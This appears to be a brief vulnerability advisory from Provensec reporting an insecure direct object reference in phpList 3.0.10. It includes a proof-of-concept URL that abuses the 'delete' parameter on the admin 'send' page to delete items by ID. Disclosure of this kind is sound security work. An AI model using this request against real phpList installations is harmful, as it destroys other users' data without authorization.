phpList version 3.0.10 suffers from an insecure direct object reference vulnerability.
7772546874c47e1bdb59fee8bab9483dadffb2743ee5e098654b4bc1dc80ac46
# Affected software: phplist
# Type of vulnerability: insecure object reference
# URL:phplist.com
# Discovered by: Provensec
# Website: http://www.provensec.com
#version: phpList ltd. - v3.0.10
# Proof of concept
insecure object refrenced on page deltetation
vuln param:delete
example:
http://demo.phplist.com/lists/admin/?page=send&delete=2&tk=035d99
ref:
https://www.owasp.org/index.php/Testing_for_Insecure_Direct_Object_References_%28OTG-AUTHZ-004%29